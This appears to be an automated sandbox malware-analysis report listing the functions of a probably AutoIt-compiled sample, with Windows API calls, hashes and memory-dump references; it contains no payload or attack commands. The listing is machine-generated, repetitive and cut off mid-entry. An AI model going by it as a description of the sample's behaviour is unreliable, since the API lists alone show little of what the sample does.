                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 243c63b0a1642fd37fbdc6bb7a016f54d23cec52ba8901b0b69bd5fd37109442
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450C09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00451191 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Listbox
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D235 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D42B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2507767853-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                                                                                                                                                                                                                                                                                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                                                                                                                                                                                                                                                                                                                • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1515696956-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00449828
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 772068139-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d608b06cc8126a94f8b189079e1e99a50943cf597b9c9b58a32df480197dd29f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AllocTask_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: hkG
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2651040394-3610518997
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-58917771
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
